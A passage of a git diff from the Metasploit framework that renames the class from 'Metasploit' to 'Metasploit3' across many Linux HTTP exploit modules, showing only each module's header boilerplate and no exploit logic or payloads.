b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 83fb7054e0..543ac2c857 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Telnet include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb index 34f5973486..d9a1f0ef17 100644 --- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb index 857a72eddf..4470db0325 100644 --- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb +++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 7cf088202e..314bc380bd 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Because only has been tested on a QEMU emulated environment HttpFingerprint = { :pattern => [ /Boa/ ] } diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb index 3ac5ba97ed..c2b8c13e31 100644 --- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb +++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index fdc7671ef0..84e8fbe741 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb +++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index f1a5a45145..914ba26974 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index ecf0215392..ef34cda681 100644 --- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 94926c60de..70967ebe23 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index a776035a85..0d747ee3b8 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index b2affba8b4..df5eab20f3 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 3c93eea34e..5478e1f05c 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dreambox_openpli_shell.rb b/modules/exploits/linux/http/dreambox_openpli_shell.rb index 3c89438681..b788d79503 100644 --- a/modules/exploits/linux/http/dreambox_openpli_shell.rb +++ b/modules/exploits/linux/http/dreambox_openpli_shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index ed30120065..86c03e5227 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb index 6735750190..dbb7f728db 100644 --- a/modules/exploits/linux/http/f5_icall_cmd.rb +++ b/modules/exploits/linux/http/f5_icall_cmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index 7c6960ac3f..a62532c29a 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index 8c11002d7b..da57034a85 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 206d4c23cd..2c4caca16b 100644 --- a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index c7c9844b4b..1a1b961b1c 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index 0abb4a8233..f3a9285a0b 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index 36fda4521a..5ebaca92ab 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index c623c60d4a..d1911a1fd9 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb index f37618a059..35eace8ecb 100644 --- a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb +++ b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 0cce50d09e..e46621bd2a 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb index 9ea7394dad..c4d7219cd1 100644 --- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 663e18e626..16b771a9f4 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index 7825c2ee16..07ef38cb19 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb index 815af49f6c..289ad49c36 100644 --- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb index bd0be86066..34f3ec1421 100644 --- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 1e8520a968..41bace5c42 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb +++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # Only tested on Emulated environment include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index 4c2d33471c..f2b62feae3 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb index 31f53d4e5c..e4c2587641 100644 --- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index fa0db90e48..6052481e8b 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index e892a53e37..2927c2bb20 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index a7a8ad6dee..d3bc972546 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index a018a8f883..8d08d715ac 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 36c7f0e337..9c17429b93 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 37dfefa63f..870ee7fdc1 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb index 5361907040..d9cab6a7a3 100644 --- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb +++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index 7ae54192f6..94a67de146 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb index 0f09dcf0cc..10111bb598 100644 --- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb +++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index 208bc2f804..bcb9e18bf2 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 3e7134164a..d6a748c00f 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 90eaa8a0f3..3cf0aafc86 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index e0b06b1a2d..234cf47a2d 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index acd6094775..d06f0ab552 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb index 50906db54d..f34b35bbf2 100644 --- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index 2bc241de5a..a98731bc11 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index cec0785760..6a0538c640 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index 0f47445ae9..b2f4258902 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb index 5f2cbb4235..dab96c8f57 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index bb5ece4575..46fe21a41f 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 97fdea5371..6a331e2b35 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index 321375620f..0d9432b712 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index d494e38b4b..f645a359fc 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 631b1abdc5..3411f73fc1 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 617a0f8117..af414339ba 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 9f5f6268bb..aaa3c51f36 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index b080e015b7..782c427555 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index d6d7b34e2f..1097a5e7bf 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index e29e7ac7f9..3a728421f4 100644 --- 